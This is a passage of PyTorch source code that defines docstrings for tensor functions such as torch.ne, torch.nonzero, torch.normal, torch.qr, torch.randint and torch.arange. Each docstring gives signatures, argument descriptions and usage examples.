""".format(**common_args))
add_docstr(torch.ne, r"""
ne(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} \neq \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is not equal to :attr:`other` and False elsewhere
Example::
>>> torch.ne(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[False, True], [True, False]])
""".format(**common_args))
add_docstr(torch.not_equal, r"""
not_equal(input, other, *, out=None) -> Tensor
Alias for :func:`torch.ne`.
""")
add_docstr(torch.neg,
r"""
neg(input, *, out=None) -> Tensor
Returns a new tensor with the negative of the elements of :attr:`input`.
.. math::
\text{out} = -1 \times \text{input}
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(5)
>>> a
tensor([ 0.0090, -0.2262, -0.0682, -0.2866, 0.3940])
>>> torch.neg(a)
tensor([-0.0090, 0.2262, 0.0682, 0.2866, -0.3940])
""".format(**common_args))
add_docstr(torch.negative,
r"""
negative(input, *, out=None) -> Tensor
Alias for :func:`torch.neg`
""")
add_docstr(torch.nextafter,
r"""
nextafter(input, other, *, out=None) -> Tensor
Return the next floating-point value after :attr:`input` towards :attr:`other`, elementwise.
The shapes of ``input`` and ``other`` must be
:ref:`broadcastable <broadcasting-semantics>`.
Args:
input (Tensor): the first input tensor
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> eps = torch.finfo(torch.float32).eps
>>> torch.nextafter(torch.tensor([1.0, 2.0]), torch.tensor([2.0, 1.0])) == torch.tensor([eps + 1, 2 - eps])
tensor([True, True])
""".format(**common_args))
add_docstr(torch.nonzero,
r"""
nonzero(input, *, out=None, as_tuple=False) -> LongTensor or tuple of LongTensors
.. note::
:func:`torch.nonzero(..., as_tuple=False) <torch.nonzero>` (default) returns a
2-D tensor where each row is the index for a nonzero value.
:func:`torch.nonzero(..., as_tuple=True) <torch.nonzero>` returns a tuple of 1-D
index tensors, allowing for advanced indexing, so ``x[x.nonzero(as_tuple=True)]``
gives all nonzero values of tensor ``x``. Of the returned tuple, each index tensor
contains nonzero indices for a certain dimension.
See below for more details on the two behaviors.
When :attr:`input` is on CUDA, :func:`torch.nonzero() <torch.nonzero>` causes
host-device synchronization.
**When** :attr:`as_tuple` **is** ``False`` **(default)**:
Returns a tensor containing the indices of all non-zero elements of
:attr:`input`. Each row in the result contains the indices of a non-zero
element in :attr:`input`. The result is sorted lexicographically, with
the last index changing the fastest (C-style).
If :attr:`input` has :math:`n` dimensions, then the resulting indices tensor
:attr:`out` is of size :math:`(z \times n)`, where :math:`z` is the total number of
non-zero elements in the :attr:`input` tensor.
**When** :attr:`as_tuple` **is** ``True``:
Returns a tuple of 1-D tensors, one for each dimension in :attr:`input`,
each containing the indices (in that dimension) of all non-zero elements of
:attr:`input` .
If :attr:`input` has :math:`n` dimensions, then the resulting tuple contains :math:`n`
tensors of size :math:`z`, where :math:`z` is the total number of
non-zero elements in the :attr:`input` tensor.
As a special case, when :attr:`input` has zero dimensions and a nonzero scalar
value, it is treated as a one-dimensional tensor with one element.
Args:
{input}
Keyword args:
out (LongTensor, optional): the output tensor containing indices
Returns:
LongTensor or tuple of LongTensor: If :attr:`as_tuple` is ``False``, the output
tensor containing indices. If :attr:`as_tuple` is ``True``, one 1-D tensor for
each dimension, containing the indices of each nonzero element along that
dimension.
Example::
>>> torch.nonzero(torch.tensor([1, 1, 1, 0, 1]))
tensor([[ 0],
[ 1],
[ 2],
[ 4]])
>>> torch.nonzero(torch.tensor([[0.6, 0.0, 0.0, 0.0],
... [0.0, 0.4, 0.0, 0.0],
... [0.0, 0.0, 1.2, 0.0],
... [0.0, 0.0, 0.0,-0.4]]))
tensor([[ 0, 0],
[ 1, 1],
[ 2, 2],
[ 3, 3]])
>>> torch.nonzero(torch.tensor([1, 1, 1, 0, 1]), as_tuple=True)
(tensor([0, 1, 2, 4]),)
>>> torch.nonzero(torch.tensor([[0.6, 0.0, 0.0, 0.0],
... [0.0, 0.4, 0.0, 0.0],
... [0.0, 0.0, 1.2, 0.0],
... [0.0, 0.0, 0.0,-0.4]]), as_tuple=True)
(tensor([0, 1, 2, 3]), tensor([0, 1, 2, 3]))
>>> torch.nonzero(torch.tensor(5), as_tuple=True)
(tensor([0]),)
""".format(**common_args))
add_docstr(torch.normal,
r"""
normal(mean, std, *, generator=None, out=None) -> Tensor
Returns a tensor of random numbers drawn from separate normal distributions
whose mean and standard deviation are given.
The :attr:`mean` is a tensor with the mean of
each output element's normal distribution
The :attr:`std` is a tensor with the standard deviation of
each output element's normal distribution
The shapes of :attr:`mean` and :attr:`std` don't need to match, but the
total number of elements in each tensor need to be the same.
.. note:: When the shapes do not match, the shape of :attr:`mean`
is used as the shape for the returned output tensor
.. note:: When :attr:`std` is a CUDA tensor, this function synchronizes
its device with the CPU.
Args:
mean (Tensor): the tensor of per-element means
std (Tensor): the tensor of per-element standard deviations
Keyword args:
{generator}
{out}
Example::
>>> torch.normal(mean=torch.arange(1., 11.), std=torch.arange(1, 0, -0.1))
tensor([ 1.0425, 3.5672, 2.7969, 4.2925, 4.7229, 6.2134,
8.0505, 8.1408, 9.0563, 10.0566])
.. function:: normal(mean=0.0, std, *, out=None) -> Tensor
:noindex:
Similar to the function above, but the means are shared among all drawn
elements.
Args:
mean (float, optional): the mean for all distributions
std (Tensor): the tensor of per-element standard deviations
Keyword args:
{out}
Example::
>>> torch.normal(mean=0.5, std=torch.arange(1., 6.))
tensor([-1.2793, -1.0732, -2.0687, 5.1177, -1.2303])
.. function:: normal(mean, std=1.0, *, out=None) -> Tensor
:noindex:
Similar to the function above, but the standard deviations are shared among
all drawn elements.
Args:
mean (Tensor): the tensor of per-element means
std (float, optional): the standard deviation for all distributions
Keyword args:
out (Tensor, optional): the output tensor
Example::
>>> torch.normal(mean=torch.arange(1., 6.))
tensor([ 1.1552, 2.6148, 2.6535, 5.8318, 4.2361])
.. function:: normal(mean, std, size, *, out=None) -> Tensor
:noindex:
Similar to the function above, but the means and standard deviations are shared
among all drawn elements. The resulting tensor has size given by :attr:`size`.
Args:
mean (float): the mean for all distributions
std (float): the standard deviation for all distributions
size (int...): a sequence of integers defining the shape of the output tensor.
Keyword args:
{out}
Example::
>>> torch.normal(2, 3, size=(1, 4))
tensor([[-1.3987, -1.9544, 3.6048, 0.7909]])
""".format(**common_args))
add_docstr(torch.numel,
r"""
numel(input) -> int
Returns the total number of elements in the :attr:`input` tensor.
Args:
{input}
Example::
>>> a = torch.randn(1, 2, 3, 4, 5)
>>> torch.numel(a)
120
>>> a = torch.zeros(4,4)
>>> torch.numel(a)
16
""".format(**common_args))
add_docstr(torch.ones,
r"""
ones(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with the scalar value `1`, with the shape defined
by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword arguments:
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.ones(2, 3)
tensor([[ 1., 1., 1.],
[ 1., 1., 1.]])
>>> torch.ones(5)
tensor([ 1., 1., 1., 1., 1.])
""".format(**factory_common_args))
add_docstr(torch.ones_like,
r"""
ones_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns a tensor filled with the scalar value `1`, with the same size as
:attr:`input`. ``torch.ones_like(input)`` is equivalent to
``torch.ones(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
.. warning::
As of 0.4, this function does not support an :attr:`out` keyword. As an alternative,
the old ``torch.ones_like(input, out=output)`` is equivalent to
``torch.ones(input.size(), out=output)``.
Args:
{input}
Keyword arguments:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
Example::
>>> input = torch.empty(2, 3)
>>> torch.ones_like(input)
tensor([[ 1., 1., 1.],
[ 1., 1., 1.]])
""".format(**factory_like_common_args))
add_docstr(torch.orgqr,
r"""
orgqr(input, tau) -> Tensor
Alias for :func:`torch.linalg.householder_product`.
""")
add_docstr(torch.ormqr,
r"""
ormqr(input, tau, other, left=True, transpose=False, *, out=None) -> Tensor
Computes the matrix-matrix multiplication of a product of Householder matrices with a general matrix.
Multiplies a :math:`m \times n` matrix `C` (given by :attr:`other`) with a matrix `Q`,
where `Q` is represented using Householder reflectors `(input, tau)`.
See `Representation of Orthogonal or Unitary Matrices`_ for further details.
If :attr:`left` is `True` then `op(Q)` times `C` is computed, otherwise the result is `C` times `op(Q)`.
When :attr:`left` is `True`, the implicit matrix `Q` has size :math:`m \times m`.
It has size :math:`n \times n` otherwise.
If :attr:`transpose` is `True` then `op` is the conjugate transpose operation, otherwise it's a no-op.
Supports inputs of float, double, cfloat and cdouble dtypes.
Also supports batched inputs, and, if the input is batched, the output is batched with the same dimensions.
.. seealso::
:func:`torch.geqrf` can be used to form the Householder representation `(input, tau)` of matrix `Q`
from the QR decomposition.
Args:
input (Tensor): tensor of shape `(*, mn, k)` where `*` is zero or more batch dimensions
and `mn` equals to `m` or `n` depending on the :attr:`left`.
tau (Tensor): tensor of shape `(*, min(mn, k))` where `*` is zero or more batch dimensions.
other (Tensor): tensor of shape `(*, m, n)` where `*` is zero or more batch dimensions.
left (bool): controls the order of multiplication.
transpose (bool): controls whether the matrix `Q` is conjugate transposed or not.
Keyword args:
out (Tensor, optional): the output Tensor. Ignored if `None`. Default: `None`.
.. _Representation of Orthogonal or Unitary Matrices:
https://www.netlib.org/lapack/lug/node128.html
""")
add_docstr(torch.permute,
r"""
permute(input, dims) -> Tensor
Returns a view of the original tensor :attr:`input` with its dimensions permuted.
Args:
{input}
dims (tuple of ints): The desired ordering of dimensions
Example:
>>> x = torch.randn(2, 3, 5)
>>> x.size()
torch.Size([2, 3, 5])
>>> torch.permute(x, (2, 0, 1)).size()
torch.Size([5, 2, 3])
""".format(**common_args))
add_docstr(torch.poisson,
r"""
poisson(input, generator=None) -> Tensor
Returns a tensor of the same size as :attr:`input` with each element
sampled from a Poisson distribution with rate parameter given by the corresponding
element in :attr:`input` i.e.,
.. math::
\text{{out}}_i \sim \text{{Poisson}}(\text{{input}}_i)
Args:
input (Tensor): the input tensor containing the rates of the Poisson distribution
Keyword args:
{generator}
Example::
>>> rates = torch.rand(4, 4) * 5 # rate parameter between 0 and 5
>>> torch.poisson(rates)
tensor([[9., 1., 3., 5.],
[8., 6., 6., 0.],
[0., 4., 5., 3.],
[2., 1., 4., 2.]])
""".format(**common_args))
add_docstr(torch.polygamma,
r"""
polygamma(n, input, *, out=None) -> Tensor
Alias for :func:`torch.special.polygamma`.
""")
add_docstr(torch.positive,
r"""
positive(input) -> Tensor
Returns :attr:`input`.
Throws a runtime error if :attr:`input` is a bool tensor.
""" + r"""
Args:
{input}
Example::
>>> t = torch.randn(5)
>>> t
tensor([ 0.0090, -0.2262, -0.0682, -0.2866, 0.3940])
>>> torch.positive(t)
tensor([ 0.0090, -0.2262, -0.0682, -0.2866, 0.3940])
""".format(**common_args))
add_docstr(torch.pow,
r"""
pow(input, exponent, *, out=None) -> Tensor
Takes the power of each element in :attr:`input` with :attr:`exponent` and
returns a tensor with the result.
:attr:`exponent` can be either a single ``float`` number or a `Tensor`
with the same number of elements as :attr:`input`.
When :attr:`exponent` is a scalar value, the operation applied is:
.. math::
\text{out}_i = x_i ^ \text{exponent}
When :attr:`exponent` is a tensor, the operation applied is:
.. math::
\text{out}_i = x_i ^ {\text{exponent}_i}
""" + r"""
When :attr:`exponent` is a tensor, the shapes of :attr:`input`
and :attr:`exponent` must be :ref:`broadcastable <broadcasting-semantics>`.
Args:
{input}
exponent (float or tensor): the exponent value
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.4331, 1.2475, 0.6834, -0.2791])
>>> torch.pow(a, 2)
tensor([ 0.1875, 1.5561, 0.4670, 0.0779])
>>> exp = torch.arange(1., 5.)
>>> a = torch.arange(1., 5.)
>>> a
tensor([ 1., 2., 3., 4.])
>>> exp
tensor([ 1., 2., 3., 4.])
>>> torch.pow(a, exp)
tensor([ 1., 4., 27., 256.])
.. function:: pow(self, exponent, *, out=None) -> Tensor
:noindex:
:attr:`self` is a scalar ``float`` value, and :attr:`exponent` is a tensor.
The returned tensor :attr:`out` is of the same shape as :attr:`exponent`
The operation applied is:
.. math::
\text{{out}}_i = \text{{self}} ^ {{\text{{exponent}}_i}}
Args:
self (float): the scalar base value for the power operation
exponent (Tensor): the exponent tensor
Keyword args:
{out}
Example::
>>> exp = torch.arange(1., 5.)
>>> base = 2
>>> torch.pow(base, exp)
tensor([ 2., 4., 8., 16.])
""".format(**common_args))
add_docstr(torch.float_power,
r"""
float_power(input, exponent, *, out=None) -> Tensor
Raises :attr:`input` to the power of :attr:`exponent`, elementwise, in double precision.
If neither input is complex returns a ``torch.float64`` tensor,
and if one or more inputs is complex returns a ``torch.complex128`` tensor.
.. note::
This function always computes in double precision, unlike :func:`torch.pow`,
which implements more typical :ref:`type promotion <type-promotion-doc>`.
This is useful when the computation needs to be performed in a wider or more precise dtype,
or the results of the computation may contain fractional values not representable in the input dtypes,
like when an integer base is raised to a negative integer exponent.
Args:
input (Tensor or Number): the base value(s)
exponent (Tensor or Number): the exponent value(s)
Keyword args:
{out}
Example::
>>> a = torch.randint(10, (4,))
>>> a
tensor([6, 4, 7, 1])
>>> torch.float_power(a, 2)
tensor([36., 16., 49., 1.], dtype=torch.float64)
>>> a = torch.arange(1, 5)
>>> a
tensor([ 1, 2, 3, 4])
>>> exp = torch.tensor([2, -3, 4, -5])
>>> exp
tensor([ 2, -3, 4, -5])
>>> torch.float_power(a, exp)
tensor([1.0000e+00, 1.2500e-01, 8.1000e+01, 9.7656e-04], dtype=torch.float64)
""".format(**common_args))
add_docstr(torch.prod,
r"""
prod(input, *, dtype=None) -> Tensor
Returns the product of all elements in the :attr:`input` tensor.
Args:
{input}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(1, 3)
>>> a
tensor([[-0.8020, 0.5428, -1.5854]])
>>> torch.prod(a)
tensor(0.6902)
.. function:: prod(input, dim, keepdim=False, *, dtype=None) -> Tensor
:noindex:
Returns the product of each row of the :attr:`input` tensor in the given
dimension :attr:`dim`.
{keepdim_details}
Args:
{input}
{dim}
{keepdim}
Keyword args:
{dtype}
Example::
>>> a = torch.randn(4, 2)
>>> a
tensor([[ 0.5261, -0.3837],
[ 1.1857, -0.2498],
[-1.1646, 0.0705],
[ 1.1131, -1.0629]])
>>> torch.prod(a, 1)
tensor([-0.2018, -0.2962, -0.0821, -1.1831])
""".format(**single_dim_common))
add_docstr(torch.promote_types,
r"""
promote_types(type1, type2) -> dtype
Returns the :class:`torch.dtype` with the smallest size and scalar kind that is
not smaller nor of lower kind than either `type1` or `type2`. See type promotion
:ref:`documentation <type-promotion-doc>` for more information on the type
promotion logic.
Args:
type1 (:class:`torch.dtype`)
type2 (:class:`torch.dtype`)
Example::
>>> torch.promote_types(torch.int32, torch.float32)
torch.float32
>>> torch.promote_types(torch.uint8, torch.long)
torch.long
""")
add_docstr(torch.qr,
r"""
qr(input, some=True, *, out=None) -> (Tensor, Tensor)
Computes the QR decomposition of a matrix or a batch of matrices :attr:`input`,
and returns a namedtuple (Q, R) of tensors such that :math:`\text{input} = Q R`
with :math:`Q` being an orthogonal matrix or batch of orthogonal matrices and
:math:`R` being an upper triangular matrix or batch of upper triangular matrices.
If :attr:`some` is ``True``, then this function returns the thin (reduced) QR factorization.
Otherwise, if :attr:`some` is ``False``, this function returns the complete QR factorization.
.. warning::
:func:`torch.qr` is deprecated in favor of :func:`torch.linalg.qr`
and will be removed in a future PyTorch release. The boolean parameter :attr:`some` has been
replaced with a string parameter :attr:`mode`.
``Q, R = torch.qr(A)`` should be replaced with
.. code:: python
Q, R = torch.linalg.qr(A)
``Q, R = torch.qr(A, some=False)`` should be replaced with
.. code:: python
Q, R = torch.linalg.qr(A, mode="complete")
.. warning::
If you plan to backpropagate through QR, note that the current backward implementation
is only well-defined when the first :math:`\min(input.size(-1), input.size(-2))`
columns of :attr:`input` are linearly independent.
This behavior will propably change once QR supports pivoting.
.. note:: This function uses LAPACK for CPU inputs and MAGMA for CUDA inputs,
and may produce different (valid) decompositions on different device types
or different platforms.
Args:
input (Tensor): the input tensor of size :math:`(*, m, n)` where `*` is zero or more
batch dimensions consisting of matrices of dimension :math:`m \times n`.
some (bool, optional): Set to ``True`` for reduced QR decomposition and ``False`` for
complete QR decomposition. If `k = min(m, n)` then:
* ``some=True`` : returns `(Q, R)` with dimensions (m, k), (k, n) (default)
* ``'some=False'``: returns `(Q, R)` with dimensions (m, m), (m, n)
Keyword args:
out (tuple, optional): tuple of `Q` and `R` tensors.
The dimensions of `Q` and `R` are detailed in the description of :attr:`some` above.
Example::
>>> a = torch.tensor([[12., -51, 4], [6, 167, -68], [-4, 24, -41]])
>>> q, r = torch.qr(a)
>>> q
tensor([[-0.8571, 0.3943, 0.3314],
[-0.4286, -0.9029, -0.0343],
[ 0.2857, -0.1714, 0.9429]])
>>> r
tensor([[ -14.0000, -21.0000, 14.0000],
[ 0.0000, -175.0000, 70.0000],
[ 0.0000, 0.0000, -35.0000]])
>>> torch.mm(q, r).round()
tensor([[ 12., -51., 4.],
[ 6., 167., -68.],
[ -4., 24., -41.]])
>>> torch.mm(q.t(), q).round()
tensor([[ 1., 0., 0.],
[ 0., 1., -0.],
[ 0., -0., 1.]])
>>> a = torch.randn(3, 4, 5)
>>> q, r = torch.qr(a, some=False)
>>> torch.allclose(torch.matmul(q, r), a)
True
>>> torch.allclose(torch.matmul(q.mT, q), torch.eye(5))
True
""")
add_docstr(torch.rad2deg,
r"""
rad2deg(input, *, out=None) -> Tensor
Returns a new tensor with each of the elements of :attr:`input`
converted from angles in radians to degrees.
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.tensor([[3.142, -3.142], [6.283, -6.283], [1.570, -1.570]])
>>> torch.rad2deg(a)
tensor([[ 180.0233, -180.0233],
[ 359.9894, -359.9894],
[ 89.9544, -89.9544]])
""".format(**common_args))
add_docstr(torch.deg2rad,
r"""
deg2rad(input, *, out=None) -> Tensor
Returns a new tensor with each of the elements of :attr:`input`
converted from angles in degrees to radians.
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.tensor([[180.0, -180.0], [360.0, -360.0], [90.0, -90.0]])
>>> torch.deg2rad(a)
tensor([[ 3.1416, -3.1416],
[ 6.2832, -6.2832],
[ 1.5708, -1.5708]])
""".format(**common_args))
add_docstr(torch.heaviside,
r"""
heaviside(input, values, *, out=None) -> Tensor
Computes the Heaviside step function for each element in :attr:`input`.
The Heaviside step function is defined as:
.. math::
\text{{heaviside}}(input, values) = \begin{cases}
0, & \text{if input < 0}\\
values, & \text{if input == 0}\\
1, & \text{if input > 0}
\end{cases}
""" + r"""
Args:
{input}
values (Tensor): The values to use where :attr:`input` is zero.
Keyword arguments:
{out}
Example::
>>> input = torch.tensor([-1.5, 0, 2.0])
>>> values = torch.tensor([0.5])
>>> torch.heaviside(input, values)
tensor([0.0000, 0.5000, 1.0000])
>>> values = torch.tensor([1.2, -2.0, 3.5])
>>> torch.heaviside(input, values)
tensor([0., -2., 1.])
""".format(**common_args))
add_docstr(torch.rand,
r"""
rand(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with random numbers from a uniform distribution
on the interval :math:`[0, 1)`
The shape of the tensor is defined by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
{generator}
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.rand(4)
tensor([ 0.5204, 0.2503, 0.3525, 0.5673])
>>> torch.rand(2, 3)
tensor([[ 0.8237, 0.5781, 0.6879],
[ 0.3816, 0.7249, 0.0998]])
""".format(**factory_common_args))
add_docstr(torch.rand_like,
r"""
rand_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns a tensor with the same size as :attr:`input` that is filled with
random numbers from a uniform distribution on the interval :math:`[0, 1)`.
``torch.rand_like(input)`` is equivalent to
``torch.rand(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
Args:
{input}
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
""".format(**factory_like_common_args))
add_docstr(torch.randint,
"""
randint(low=0, high, size, \\*, generator=None, out=None, \
dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with random integers generated uniformly
between :attr:`low` (inclusive) and :attr:`high` (exclusive).
The shape of the tensor is defined by the variable argument :attr:`size`.
.. note::
With the global dtype default (``torch.float32``), this function returns
a tensor with dtype ``torch.int64``.
Args:
low (int, optional): Lowest integer to be drawn from the distribution. Default: 0.
high (int): One above the highest integer to be drawn from the distribution.
size (tuple): a tuple defining the shape of the output tensor.
Keyword args:
{generator}
{out}
dtype (`torch.dtype`, optional) - the desired data type of returned tensor. Default: if ``None``,
this function returns a tensor with dtype ``torch.int64``.
{layout}
{device}
{requires_grad}
Example::
>>> torch.randint(3, 5, (3,))
tensor([4, 3, 4])
>>> torch.randint(10, (2, 2))
tensor([[0, 2],
[5, 5]])
>>> torch.randint(3, 10, (2, 2))
tensor([[4, 5],
[6, 7]])
""".format(**factory_common_args))
add_docstr(torch.randint_like,
"""
randint_like(input, low=0, high, \\*, dtype=None, layout=torch.strided, device=None, requires_grad=False, \
memory_format=torch.preserve_format) -> Tensor
Returns a tensor with the same shape as Tensor :attr:`input` filled with
random integers generated uniformly between :attr:`low` (inclusive) and
:attr:`high` (exclusive).
.. note:
With the global dtype default (``torch.float32``), this function returns
a tensor with dtype ``torch.int64``.
Args:
{input}
low (int, optional): Lowest integer to be drawn from the distribution. Default: 0.
high (int): One above the highest integer to be drawn from the distribution.
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
""".format(**factory_like_common_args))
add_docstr(torch.randn,
r"""
randn(*size, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a tensor filled with random numbers from a normal distribution
with mean `0` and variance `1` (also called the standard normal
distribution).
.. math::
\text{{out}}_{{i}} \sim \mathcal{{N}}(0, 1)
The shape of the tensor is defined by the variable argument :attr:`size`.
Args:
size (int...): a sequence of integers defining the shape of the output tensor.
Can be a variable number of arguments or a collection like a list or tuple.
Keyword args:
{generator}
{out}
{dtype}
{layout}
{device}
{requires_grad}
Example::
>>> torch.randn(4)
tensor([-2.1436, 0.9966, 2.3426, -0.6366])
>>> torch.randn(2, 3)
tensor([[ 1.5954, 2.8929, -1.0923],
[ 1.1719, -0.4709, -0.1996]])
""".format(**factory_common_args))
add_docstr(torch.randn_like,
r"""
randn_like(input, *, dtype=None, layout=None, device=None, requires_grad=False, memory_format=torch.preserve_format) -> Tensor
Returns a tensor with the same size as :attr:`input` that is filled with
random numbers from a normal distribution with mean 0 and variance 1.
``torch.randn_like(input)`` is equivalent to
``torch.randn(input.size(), dtype=input.dtype, layout=input.layout, device=input.device)``.
Args:
{input}
Keyword args:
{dtype}
{layout}
{device}
{requires_grad}
{memory_format}
""".format(**factory_like_common_args))
add_docstr(torch.randperm,
"""
randperm(n, *, generator=None, out=None, dtype=torch.int64,layout=torch.strided, \
device=None, requires_grad=False, pin_memory=False) -> Tensor
""" + r"""
Returns a random permutation of integers from ``0`` to ``n - 1``.
Args:
n (int): the upper bound (exclusive)
Keyword args:
{generator}
{out}
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: ``torch.int64``.
{layout}
{device}
{requires_grad}
{pin_memory}
Example::
>>> torch.randperm(4)
tensor([2, 1, 0, 3])
""".format(**factory_common_args))
add_docstr(torch.tensor,
r"""
tensor(data, *, dtype=None, device=None, requires_grad=False, pin_memory=False) -> Tensor
Constructs a tensor with no autograd history (also known as a "leaf tensor", see :doc:`/notes/autograd`) by copying :attr:`data`.
.. warning::
When working with tensors prefer using :func:`torch.Tensor.clone`,
:func:`torch.Tensor.detach`, and :func:`torch.Tensor.requires_grad_` for
readability. Letting `t` be a tensor, ``torch.tensor(t)`` is equivalent to
``t.clone().detach()``, and ``torch.tensor(t, requires_grad=True)``
is equivalent to ``t.clone().detach().requires_grad_(True)``.
.. seealso::
:func:`torch.as_tensor` preserves autograd history and avoids copies where possible.
:func:`torch.from_numpy` creates a tensor that shares storage with a NumPy array.
Args:
{data}
Keyword args:
{dtype}
device (:class:`torch.device`, optional): the device of the constructed tensor. If None and data is a tensor
then the device of data is used. If None and data is not a tensor then
the result tensor is constructed on the CPU.
{requires_grad}
{pin_memory}
Example::
>>> torch.tensor([[0.1, 1.2], [2.2, 3.1], [4.9, 5.2]])
tensor([[ 0.1000, 1.2000],
[ 2.2000, 3.1000],
[ 4.9000, 5.2000]])
>>> torch.tensor([0, 1]) # Type inference on data
tensor([ 0, 1])
>>> torch.tensor([[0.11111, 0.222222, 0.3333333]],
... dtype=torch.float64,
... device=torch.device('cuda:0')) # creates a double tensor on a CUDA device
tensor([[ 0.1111, 0.2222, 0.3333]], dtype=torch.float64, device='cuda:0')
>>> torch.tensor(3.14159) # Create a zero-dimensional (scalar) tensor
tensor(3.1416)
>>> torch.tensor([]) # Create an empty tensor (of size (0,))
tensor([])
""".format(**factory_data_common_args))
add_docstr(torch.range,
r"""
range(start=0, end, step=1, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a 1-D tensor of size :math:`\left\lfloor \frac{\text{end} - \text{start}}{\text{step}} \right\rfloor + 1`
with values from :attr:`start` to :attr:`end` with step :attr:`step`. Step is
the gap between two values in the tensor.
.. math::
\text{out}_{i+1} = \text{out}_i + \text{step}.
""" + r"""
.. warning::
This function is deprecated and will be removed in a future release because its behavior is inconsistent with
Python's range builtin. Instead, use :func:`torch.arange`, which produces values in [start, end).
Args:
start (float): the starting value for the set of points. Default: ``0``.
end (float): the ending value for the set of points
step (float): the gap between each pair of adjacent points. Default: ``1``.
Keyword args:
{out}
{dtype} If `dtype` is not given, infer the data type from the other input
arguments. If any of `start`, `end`, or `stop` are floating-point, the
`dtype` is inferred to be the default dtype, see
:meth:`~torch.get_default_dtype`. Otherwise, the `dtype` is inferred to
be `torch.int64`.
{layout}
{device}
{requires_grad}
Example::
>>> torch.range(1, 4)
tensor([ 1., 2., 3., 4.])
>>> torch.range(1, 4, 0.5)
tensor([ 1.0000, 1.5000, 2.0000, 2.5000, 3.0000, 3.5000, 4.0000])
""".format(**factory_common_args))
add_docstr(torch.arange,
r"""
arange(start=0, end, step=1, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Returns a 1-D tensor of size :math:`\left\lceil \frac{\text{end} - \text{start}}{\text{step}} \right\rceil`
with values from the interval ``[start, end)`` taken with common difference
:attr:`step` beginning from `start`.
Note that non-integer :attr:`step` is subject to floating point rounding errors when
comparing against :attr:`end`; to avoid inconsistency, we advise adding a small epsilon to :attr:`end`
in such cases.
.. math::
\text{out}_{{i+1}} = \text{out}_{i} + \text{step}
""" + r"""
Args:
start (Number): the starting value for the set of points. Default: ``0``.
end (Number): the ending value for the set of points
step (Number): the gap between each pair of adjacent points. Default: ``1``.
Keyword args:
{out}
{dtype} If `dtype` is not given, infer the data type from the other input
arguments. If any of `start`, `end`, or `stop` are floating-point, the
`dtype` is inferred to be the default dtype, see
:meth:`~torch.get_default_dtype`. Otherwise, the `dtype` is inferred to
be `torch.int64`.
{layout}
{device}
{requires_grad}
Example::
>>> torch.arange(5)
tensor([ 0, 1, 2, 3, 4])
>>> torch.arange(1, 4)
tensor([ 1, 2, 3])
>>> torch.arange(1, 2.5, 0.5)
tensor([ 1.0000, 1.5000, 2.0000])
""".format(**factory_common_args))
add_docstr(torch.ravel,
r"""
ravel(input) -> Tensor
Return a contiguous flattened tensor. A copy is made only if needed.
Args:
{input}
Example::
>>> t = torch.tensor([[[1, 2],
... [3, 4]],
... [[5, 6],
... [7, 8]]])
>>> torch.ravel(t)
tensor([1, 2, 3, 4, 5, 6, 7, 8])
""".format(**common_args))
add_docstr(torch.remainder,
r"""
remainder(input, other, *, out=None) -> Tensor
Like :func:`torch.fmod` this applies C++'s `std::fmod <https://en.cppreference.com/w/cpp/numeric/math/fmod>`_
for floating point tensors and the modulus operation for integer tensors.
Unlike :func:`torch.fmod`, however, if the sign of the modulus is different
than the sign of the divisor :attr:`other` then the divisor is added to the modulus.
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer and float inputs.
.. note::
Complex inputs are not supported. In some cases, it is not mathematically
possible to satisfy the definition of a modulo operation with complex numbers.
See :func:`torch.fmod` for how division by zero is handled.
.. note::
This op, like NumPy's `remainder <https://numpy.org/doc/stable/reference/generated/numpy.remainder.html>`_,
is equivalent to Python's modulus operation, and different from Python's
`math.remainder <https://docs.python.org/dev/library/math.html#math.remainder>`_ and
C++'s `std::remainder <https://en.cppreference.com/w/cpp/numeric/math/remainder>`_ which implement
the IEEE remainder.
Args:
input (Tensor or Scalar): the dividend
other (Tensor or Scalar): the divisor
Keyword args:
{out}
Example::
>>> torch.remainder(torch.tensor([-3., -2, -1, 1, 2, 3]), 2)
tensor([ 1., 0., 1., 1., 0., 1.])
>>> torch.remainder(torch.tensor([1, 2, 3, 4, 5]), -1.5)
tensor([ -0.5000, -1.0000, 0.0000, -0.5000, -1.0000 ])
.. seealso::
